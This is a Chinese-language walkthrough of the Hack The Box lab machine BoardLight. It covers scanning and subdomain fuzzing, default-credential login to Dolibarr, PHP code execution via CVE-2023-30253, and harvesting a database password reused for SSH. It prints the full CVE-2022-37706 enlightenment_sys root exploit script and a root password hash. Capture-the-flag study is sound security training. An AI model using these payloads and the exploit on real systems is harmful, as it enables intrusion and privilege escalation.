HTB-BoardLight笔记

admin 2024年7月15日16:26:43评论43 views字数 2642阅读8分48秒阅读模式

HTB-BoardLight笔记

扫描靶机

nmap -p 1-65535 -T4 -A -v 10.10.11.11

HTB-BoardLight笔记

扫描出4个端口,有个邮件服务,没啥用处,先看80端口

HTB-BoardLight笔记

页面没什么信息可以得到,看后台代码,可以得到一个域名:Board.htb

HTB-BoardLight笔记

跑一下目录

dirsearch -u http://board.htb/

HTB-BoardLight笔记

跑出了一些目录,但是用处不大,然后跑一下子域名

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://board.htb/" -H "Host: FUZZ.board.htb" --hc 404 --hl 517

HTB-BoardLight笔记

找到了一个子域名crm,写到hosts,然后打开

HTB-BoardLight笔记

找到了一个cms,Dolibarr的,版本是17.0.0,使用默认账号可以登录进去,admin:admin

HTB-BoardLight笔记

HTB-BoardLight笔记

登录进去了,在网上可以寻找该版本的poc

https://www.tenable.com/cve/CVE-2023-30253

https://github.com/Dolibarr/dolibarr

利用该版本的exp,可以新建一个网站,然后写入带有rce的php,点击网站选项新建一个

HTB-BoardLight笔记

新建完成后新建一个page,写入名字标题,最底下写入代码

HTB-BoardLight笔记

创建完成后会出现page的id编码

HTB-BoardLight笔记

鼠标停到放大镜那里会告诉你如何访问你新建的网站

HTB-BoardLight笔记

点击编辑html源填写代码

HTB-BoardLight笔记

<?PHP echo system("whoami")."<br><br>";?>

HTB-BoardLight笔记

直接保存后会自动运行php代码,头部php要大写,不然会被拦截

HTB-BoardLight笔记

在里面添加rce的php,然后直接运行

HTB-BoardLight笔记

HTB-BoardLight笔记

成功的反弹了shell,搜索一下文件夹,在/var/www/html/crm.board.htb/htdocs/conf里面可以找到一个conf.php文件,里面记录了数据库的用户信息

HTB-BoardLight笔记

使用该用户登录到数据库查看一下内容

$dolibarr_main_url_root='http://crm.board.htb';$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';$dolibarr_main_url_root_alt='/custom';$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';$dolibarr_main_db_host='localhost';$dolibarr_main_db_port='3306';$dolibarr_main_db_name='dolibarr';$dolibarr_main_db_prefix='llx_';$dolibarr_main_db_user='dolibarrowner';$dolibarr_main_db_pass='serverfun2$2023!!';$dolibarr_main_db_type='mysqli';$dolibarr_main_db_character_set='utf8';$dolibarr_main_db_collation='utf8_unicode_ci';// Authentication settings$dolibarr_main_authentication='dolibarr';

HTB-BoardLight笔记

使用该密码验证一下能否登录ssh

HTB-BoardLight笔记

成功登录了,拿到了user flag,密码是:serverfun2$2023!!,上传linpeas.sh查看一下提权信息

HTB-BoardLight笔记

可以看到一个/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys,这个属于属于Enlightenment系列,这是一种用于Linux系统的轻量级桌面环境,enlightenment_sys是Enlightenment用于执行系统操作的工具,如果enlightenment_sys配置不当或存在缺陷,可能允许本地用户以root或其他特权用户的身份执行命令,可以使用这个脚本,根据脚本里面的步骤可以测试得知能否使用

https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit

HTB-BoardLight笔记

成功拿到了root flag

#!/bin/bash
echo "CVE-2022-37706"echo "[*] Trying to find the vulnerable SUID file..."echo "[*] This may take few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)if [[ -z ${file} ]]then        echo "[-] Couldn't find the vulnerable SUID file..."        echo "[*] Enlightenment should be installed on your system."        exit 1fi
echo "[+] Vulnerable SUID binary found!"echo "[+] Trying to pop a root shell!"mkdir -p /tmp/netmkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploitchmod a+x /tmp/exploitecho "[+] Enjoy the root shell :)"${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
root:$6$h9/xKUsFWX90kjQc$qcBeHXPiRHqbF0NgNxhPiZzYS1DiH4UnQc2kcshKtYEDPbjDe3E5qihEbapIJk8fAxRaj3T7EGReRQYiFIBHO1:19845:0:99999:7:::

 

原文始发于微信公众号(Jiyou too beautiful):HTB-BoardLight笔记

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月15日16:26:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB-BoardLight笔记http://cn-sec.com/archives/2782296.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息